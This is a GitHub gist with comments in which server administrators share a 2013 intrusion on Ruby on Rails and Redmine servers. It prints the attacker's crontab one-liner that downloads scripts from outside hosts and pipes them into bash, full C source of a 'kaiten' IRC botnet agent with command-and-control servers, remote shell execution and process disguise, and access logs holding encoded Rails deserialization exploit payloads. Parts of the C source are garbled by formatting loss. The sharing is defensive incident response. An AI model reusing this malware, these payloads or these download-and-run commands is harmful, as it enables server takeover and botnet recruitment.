Skip to content

Instantly share code, notes, and snippets.

@ismasan
Created May 25, 2013 04:55
Show Gist options
  • Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
@bu2
Copy link

bu2 commented May 26, 2013

Hi,

We have the same problem on customer servers dedicated to a custom Ruby on Rails application.
I have noticed different crontab during the past four days (since 23th of May).

On 2013-05-23:

  • 1 * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka

On 2013-05-24:
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k

Today:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;

I suspect (but I have no clue ^^) the root vulnerability which give access to the server might be related to Ruby on Rails. We are using:

  • Ruby 1.9.3 p327
  • Ruby On Rails 3.2.11

And we didn't manage to update our servers because we are still in heavy development mode.

We tried to change root password as quick fix but it didn't stop the attacker (I am even not sure that he needs/uses root access as he overrides user-level crontab...).

Regards.

@bu2
Copy link

bu2 commented May 26, 2013

Here is the code of kaiten-src.c, kind of botnet agent which was uploaded and run repetitively since the first crontab intrusion:

////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////

undef STARTUP // Start on startup?

undef IDENT // Only enable this if you absolutely have to

define FAKENAME "- bash" // What you want this to hide as

define CHAN "#rails" // Channel to join

define TEMPDIR "/var/tmp" // Where to save generated ips text file

define KEY "" // The key of the channel

define VERSION "0.1" // dfnctsc-kaiten release version

define PORT 6667 // Port of server(s)

int numservers = 1; // Must change this to equal number of servers down there
char servers[] = {// List the servers in that format, always end in (void)0
"cvv4you.ru",
"188.190.124.120",
(void*) 0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////

include <stdarg.h>

include <errno.h>

include <stdio.h>

include <stdlib.h>

include <string.h>

include <sys/types.h>

include <sys/stat.h>

include <fcntl.h>

include <strings.h>

include <netinet/in.h>

include <unistd.h>

include <sys/time.h>

include <sys/socket.h>

include <signal.h>

include <arpa/inet.h>

include <netdb.h>

include <time.h>

include <ctype.h>

include <sys/wait.h>

include <sys/ioctl.h>

int sock, changeservers = 0;
char *server, *chan, *key, *nick, *ident, *user, execfile[256], dispass[256];
unsigned int *pids;
unsigned long spoofs = 0, spoofsm = 0, numpids = 0, running = 0;

int strwildmatch(const char* pattern, const char* string) {
switch (pattern) {
case '\0': return *string;
case '
': return !(!strwildmatch(pattern + 1, string) || _string && !strwildmatch(pattern, string + 1));
case '?': return !(_string && !strwildmatch(pattern + 1, string + 1));
default: return !((toupper(_pattern) == toupper(_string)) && !strwildmatch(pattern + 1, string + 1));
}
}

int send_msg(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args);
va_end(args);
return write(sock, textBuffer, strlen(textBuffer));
}

int mfork(char sender) {
unsigned int parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent;
numpids++;
newpids = (unsigned int
) malloc((numpids + 1) * sizeof (unsigned int));
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
free(pids);
pids = newpids;
return parent;
}

void filter(char *a) {
while (a[strlen(a) - 1] == '\r' || a[strlen(a) - 1] == '\n') a[strlen(a) - 1] = 0;
}

char makestring() {
char *tmp;
int len = 9, i;
tmp = (char
) malloc(len + 1);
memset(tmp, 0, len + 1);
for (i = 0; i < len; i++) tmp[i] = (rand() % (91 - 65)) + 65;
return tmp;
}

long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a * pow(a, b - 1);
}

u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}

void get(int sock, char _sender, int argc, char *_argv) {
int sock2, i, d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
send_msg(sock, "PRIVMSG %s :GET \n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
send_msg(sock, "PRIVMSG %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1], "http://", 7)) strcpy(buf, argv[1] + 7);
else strcpy(buf, argv[1]);
for (i = 0; i < strlen(buf) && buf[i] != '/'; i++);
buf[i] = 0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm = gethostbyname(buf)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char
) &server.sin_addr, hostm->h_addr, hostm->h_length);
} else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2, (struct sockaddr *) &server, sizeof (server)) != 0) {
send_msg(sock, "PRIVMSG %s :Unable to connect to http.\n", sender);
exit(0);
}

send_msg(sock2, "GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n", buf + i + 1, buf);
send_msg(sock, "PRIVMSG %s :Receiving file.\n", chan);
file = fopen(argv[2], "wb");
while (1) {
    int i;
    if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
    if (i < 4096) bufm[i] = 0;
    for (d = 0; d < i; d++) if (!strncmp(bufm + d, "\r\n\r\n", 4)) {
            for (d += 4; d < i; d++) fputc(bufm[d], file);
            goto done;
        }
}

done:
send_msg(sock, "PRIVMSG %s :Saved as %s\n", chan, argv[2]);
while (1) {
int i, d;
if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
if (i < 4096) bufm[i] = 0;
for (d = 0; d < i; d++) fputc(bufm[d], file);
}
fclose(file);
close(sock2);
exit(0);
}

void nickc(int sock, char _sender, int argc, char *_argv) {
if (argc != 1) {
send_msg(sock, "PRIVMSG %s :NICK \n", sender);
return;
}
if (strlen(argv[1]) >= 10) {
send_msg(sock, "PRIVMSG %s :Nick cannot be larger than 9 characters.\n", sender);
return;
}
send_msg(sock, "NICK %s\n", argv[1]);
}

struct iphdr {
unsigned int ihl : 4, version : 4;
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};

struct udphdr {
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};

struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned short res1 : 4, doff : 4;
unsigned char fin : 1, syn : 1, rst : 1, psh : 1, ack : 1, urg : 1, ece : 1, cwr : 1;
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};

struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};

struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};

unsigned int host2ip(char *sender, char *hostname) {
static struct in_addr i;
struct hostent *h;
if ((i.s_addr = inet_addr(hostname)) == -1) {
if ((h = gethostbyname(hostname)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve %s\n", sender, hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}

void move(int sock, char _sender, int argc, char *_argv) {
if (argc < 1) {
send_msg(sock, "PRIVMSG %s :MOVE \n", sender);
exit(1);
}
server = strdup(argv[1]);
changeservers = 1;
close(sock);
}

void killd(int sock, char _sender, int argc, char *_argv) {
kill(0, 9);
}

void help(int sock, char _sender, int argc, char *_argv) {
if (mfork(sender) != 0) return;
send_msg(sock, "NOTICE %s :NICK = Changes the nick of the client\n", sender);
send_msg(sock, "NOTICE %s :SERVER = Changes servers\n", sender);
send_msg(sock, "NOTICE %s :KILL = Kills the client\n", sender);
send_msg(sock, "NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n", sender);
send_msg(sock, "NOTICE %s :HELP = Displays this\n", sender);
send_msg(sock, "NOTICE %s :IRC = send_msgs this command to the server\n", sender);
send_msg(sock, "NOTICE %s :SH = Executes a command\n", sender);
exit(0);
}

struct FMessages {
char cmd;
void (
func)(int, char , int, char *);
} flooders[] = {

{ "NICK", nickc},
{ "SERVER", move},
{ "GET", get},
{ "KILL", killd},
{ "HELP", help},

{ (char *) 0, (void (*)(int, char *, int, char **))0}

};

void _PRIVMSG(int sock, char _sender, char *str) {
int i;
char *to, *message;
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
to = str;
message = str + i + 2;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (_message == '!' && !strcasecmp(to, chan)) {
char _params[12], name[1024] = {0};
int num_params = 0, m;
message++;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
message[i] = 0;
if (strwildmatch(message, nick)) return;
message += i + 1;
if (!strncmp(message, "IRC ", 4)) send_msg(sock, "%s\n", message + 4);
if (!strncmp(message, "SH ", 3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf, 0, 1024);
sprintf(buf, "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s", message + 3);
command = popen(buf, "r");
while (!feof(command)) {
memset(buf, 0, 1024);
fgets(buf, 1024, command);
send_msg(sock, "PRIVMSG %s :%s\n", chan, buf);
sleep(1);
}
pclose(command);
exit(0);
}
m = strlen(message);
for (i = 0; i < m; i++) {
if (_message == ' ' || _message == 0) break;
name[i] = message;
message++;
}
for (i = 0; i < strlen(message); i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params = 10;
params[0] = name;
params[num_params + 1] = "\0";
m = 1;
while (_message != 0) {
message++;
if (m >= num_params) break;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
params[m] = (char
) malloc(i + 1);
strncpy(params[m], message, i);
params[m][i] = 0;
m++;
message += i;
}
for (m = 0; flooders[m].cmd != (char *) 0; m++) {
if (!strcasecmp(flooders[m].cmd, name)) {
flooders[m].func(sock, sender, num_params - 1, params);
for (i = 1; i < num_params; i++) free(params[i]);
return;
}
}
}
}

void _376(int sock, char *sender, char *str) {
send_msg(sock, "MODE %s -ix\n", nick);
send_msg(sock, "JOIN %s :%s\n", chan, key);
send_msg(sock, "WHO %s\n", nick);
}

void _PING(int sock, char *sender, char *str) {
send_msg(sock, "PONG %s\n", str);
}

void 352(int sock, char sender, char *str) {
int i, d;
char *msg = str;
struct hostent *hostm;
unsigned long m;
for (i = 0, d = 0; d < 5; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if (!strcasecmp(msg, nick) && !spoofsm) {
msg = str;
for (i = 0, d = 0; d < 3; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm = gethostbyname(msg)) == NULL) {
send_msg(sock, "PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n", sender);
return;
}
memcpy((char
) &m, hostm->h_addr, hostm->h_length);
}
((char
) &spoofs)[3] = ((char_) &m)[0];
((char_) &spoofs)[2] = ((char_) &m)[1];
((char_) &spoofs)[1] = ((char_) &m)[2];
((char*) &spoofs)[0] = 0;
spoofsm = 256;
}
}

void _433(int sock, char *sender, char *str) {
free(nick);
nick = makestring();
}

void _NICK(int sock, char _sender, char *str) {
int i;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (!strcasecmp(sender, nick)) {
if (_str == ':') str++;
if (nick) free(nick);
nick = strdup(str);
}
}

struct Messages {
char cmd;
void (
func)(int, char _, char *);
} msgs[] = {
{ "352", _352},
{ "376", _376},
{ "433", _433},
{ "422", _376},
{ "PRIVMSG", _PRIVMSG},
{ "PING", _PING},
{ "NICK", NICK},
{ (char *) 0, (void (
)(int, char *, char *))0}
};

void con() {
struct sockaddr_in srv;
unsigned long ipaddr, start;
int flag;
struct hostent hp;
start:
sock = -1;
flag = 1;
if (changeservers == 0) server = servers[rand() % numservers];
changeservers = 0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server = NULL;
close(sock);
goto start;
}
bcopy((char
) hp->h_addr, (char*) &srv.sin_addr, hp->h_length);
} else srv.sin_addr.s_addr = inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(PORT);
ioctl(sock, FIONBIO, &flag);
start = time(NULL);
while (time(NULL) - start < 10) {
errno = 0;
if (connect(sock, (struct sockaddr *) &srv, sizeof (srv)) == 0 || errno == EISCONN) {
setsockopt(sock, SOL_SOCKET, SO_LINGER, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, 0, 0);
return;
}
if (!(errno == EINPROGRESS || errno == EALREADY)) break;
sleep(1);
}
server = NULL;
close(sock);
goto start;
}

int lockfile() {
int pid_file = open("/tmp/tan.pid", O_CREAT | O_RDWR, 0666);
int rc = flock(pid_file, LOCK_EX | LOCK_NB);
if (rc && EWOULDBLOCK == errno) {
printf("Lockfile found. Exiting.");
exit(0);
}
}

int main(int argc, char **argv) {
lockfile();
int on, i;
char cwd[256], *str;
FILE *file;

ifdef STARTUP

str = "/etc/rc.d/rc.local";
file = fopen(str, "r");
if (file == NULL) {
    str = "/etc/rc.conf";
    file = fopen(str, "r");
}
if (file != NULL) {
    char outfile[256], buf[1024];
    int i = strlen(argv[0]), d = 0;
    getcwd(cwd, 256);
    if (strcmp(cwd, "/")) {
        while (argv[0][i] != '/') i--;
        sprintf(outfile, "\"%s%s\"\n", cwd, argv[0] + i);
        while (!feof(file)) {
            fgets(buf, 1024, file);
            if (!strcasecmp(buf, outfile)) d++;
        }
        if (d == 0) {
            FILE *out;
            fclose(file);
            out = fopen(str, "a");
            if (out != NULL) {
                fputs(outfile, out);
                fclose(out);
            }
        } else fclose(file);
    } else fclose(file);
}

endif

if (fork()) exit(0);

ifdef FAKENAME

strncpy(argv[0], FAKENAME, strlen(argv[0]));
for (on = 1; on < argc; on++) memset(argv[on], 0, strlen(argv[on]));

endif

srand((time(NULL) ^ getpid()) + getppid());
nick = makestring();
ident = makestring();
user = "raft";
chan = CHAN;
key = KEY;
server = NULL;

sa:

ifdef IDENT

for (i = 0; i < numpids; i++) {
    if (pids[i] != 0 && pids[i] != getpid()) {
        kill(pids[i], 9);
        waitpid(pids[i], NULL, WNOHANG);
    }
}
pids = NULL;
numpids = 0;
identd();

endif

con();
send_msg(sock, "NICK %s\nUSER %s localhost localhost :%s\n", nick, ident, user);
while (1) {
    unsigned long i;
    fd_set n;
    struct timeval tv;
    FD_ZERO(&n);
    FD_SET(sock, &n);
    tv.tv_sec = 60 * 20;
    tv.tv_usec = 0;
    if (select(sock + 1, &n, (fd_set*) 0, (fd_set*) 0, &tv) <= 0) goto sa;
    for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
            unsigned int *newpids, on;
            for (on = i + 1; on < numpids; on++) pids[on - 1] = pids[on];
            pids[on - 1] = 0;
            numpids--;
            newpids = (unsigned int*) malloc((numpids + 1) * sizeof (unsigned int));
            for (on = 0; on < numpids; on++) newpids[on] = pids[on];
            free(pids);
            pids = newpids;
        }
    if (FD_ISSET(sock, &n)) {
        char buf[4096], *str;
        int i;
        if ((i = recv(sock, buf, 4096, 0)) <= 0) goto sa;
        buf[i] = 0;
        str = strtok(buf, "\n");
        while (str && *str) {
            char name[1024], sender[1024];
            filter(str);
            if (*str == ':') {
                for (i = 0; i < strlen(str) && str[i] != ' '; i++);
                str[i] = 0;
                strcpy(sender, str + 1);
                strcpy(str, str + i + 1);
            } else strcpy(sender, "*");
            for (i = 0; i < strlen(str) && str[i] != ' '; i++);
            str[i] = 0;
            strcpy(name, str);
            strcpy(str, str + i + 1);
            for (i = 0; msgs[i].cmd != (char *) 0; i++) if (!strcasecmp(msgs[i].cmd, name)) msgs[i].func(sock, sender, str);
            if (!strcasecmp(name, "ERROR")) goto sa;
            str = strtok((char*) NULL, "\n");
        }
    }
}
return 0;

}

@Netmisa
Copy link

Netmisa commented May 26, 2013

Hi,

Ok that's why I asked if one of you have redmine. Because I found interesting logs.

I think he uses "/login?back_url="

nginx/access.log (My redmine)

17510: 88.198.20.247 - - [24/May/2013:15:17:34 +0200] "HEAD / HTTP/1.1" 302 0 "-" "-" "-"
.....
17584: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "POST / HTTP/1.1" 302 1256 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17585: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4006 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17586: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 778 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17587: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3669 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17588: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 904 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17589: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3760 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17590  89.100.221.85 - - [24/May/2013:18:13:47 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17591  89.100.221.85 - - [24/May/2013:18:14:00 +0200] "-" 400 0 "-" "-" "-"
 .....
 17628  89.100.221.85 - - [24/May/2013:20:39:12 +0200] "-" 400 0 "-" "-" "-"
 17629: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "POST / HTTP/1.1" 302 1200 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17630: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgGpc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycpCgY6BkVUOgxAbWV0aG9kOgtyZXN1bHQ%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 3948 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17631: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 706 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17632: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3601 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17633: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 832 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17634: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3691 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17635  89.100.221.85 - - [24/May/2013:21:40:43 +0200] "-" 400 0 "-" "-" "-"
 17636  89.100.221.85 - - [24/May/2013:21:44:10 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 .....
 17836: 88.198.20.247 - - [24/May/2013:23:10:01 +0200] "POST / HTTP/1.1" 302 1396 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
